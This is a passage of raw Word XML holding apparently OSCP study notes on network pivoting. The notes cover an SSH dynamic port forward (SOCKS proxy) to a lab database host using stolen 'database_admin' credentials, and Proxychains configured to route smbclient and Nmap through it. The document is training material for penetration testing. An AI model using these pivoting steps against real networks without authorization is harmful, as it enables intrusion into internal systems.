            <wp:docPr id="295" name="image283.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image283.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="972"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells SSH to start a SOCKS5 proxy,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which we will then connect to via Proxychains. And if we weren't using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we would have to manually configure applications to use the SOCKS proxy if they are SOCKS compatible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000876">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="972"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000877">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="972"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will create our SSH connection to PGDATABASE01 using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">database_admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials again. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000878">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="972"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In OpenSSH, a dynamic port forward is created with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-D</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option. The only argument this takes is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP address </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we want to bind to. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000879">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="972"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, we want it to listen on all interfaces (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0.0.0.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9999</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000087A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="972"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We don't have to specify a socket address to forward to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">since the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKET </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">headers will have that information</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000087B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="972"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll also pass the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-N</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag to prevent a shell from being spawned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000087C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000087D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As with the previous example, we don't receive any immediate output after we enter the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000087E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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As we did earlier, let's connect to port 445 on HRSHARES. However, this time we will do it through the SOCKS proxy port created by our SSH dynamic port forward command.</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To accomplish this, we'll want to use smbclient again. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, we find that smbclient doesn't natively provide an option to use a SOCKS proxy. Without a native option to use a SOCKS proxy in smbclient, we can't take advantage of our dynamic port forward.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The SOCKS proxy can't determine how to handle traffic that isn't encapsulated in the SOCKS protocol format.</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qi46mrp99xz1" w:id="78"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxychains</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The</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP Module 27. Assembling the Pieces </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">goes into a lot depth with using proxychains, specifically with metasploit, and it shows how to use a variety of tools with proxychains!</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Note: In order for NMAP to work with proxychains, we must specify</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to perform a TCP connect scan. Otherwise, Nmap will not work over Proxychains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000888">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1431"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And also, you can use the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag right after typing "proxychains" for quietmode, as shown in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP Module 27. Assembling the Pieces</w:t>
      </w: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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To use smbclient in this situation, we'll leverage </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxychains </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a tool that can force network traffic from third party tools over HTTP or SOCKS proxies. As the name suggests, it can also be configured to push traffic over a chain of concurrent proxies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000088B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000088C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The way Proxychains works is a light hack. It uses the Linux shared object preloading technique (LD_PRELOAD) to hook libc networking functions within the binary that gets passed to it and forces all connections over the configured proxy server. This means it might not work for everything but will work for most dynamically-linked binaries that perform simple network operations. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It won't work on statically linked binaries</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000088D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000088E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's try Proxychains with smbclient. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxychains uses a configuration file for almost everything</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, stored by default at</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/proxychains4.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000088F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We need to edit this file to ensure that Proxychains can locate our SOCKS proxy port and confirm that it's a SOCKS proxy (rather than any other kind of proxy). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000890">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000891">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, proxies are defined at the end of the file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">simply replace any existing proxy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">definition in that file with a single line defining the proxy type, IP address, and port of the SOCKS proxy running on CONFLUENCE01 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5 192.168.50.63 9999</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000892">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000893">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After editing the file (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ON OUR KALI MACHINE)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it should appear as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000894">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2171700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="296" name="image290.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image290.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">our Kali Machine to connect to the SOCKS5 proxy on CONFLUNCE01 that was opened using the SSH -d command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000896">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tail /etc/proxychains4.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5 192.168.50.63 9999</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000898">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The IP address belongs to CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000899">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000089A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What this does is that we now are connected to the SOCKS5 proxy on CONFLUENCE01 (port 9999). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are only connected to the proxy whenever we use the proxychains command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
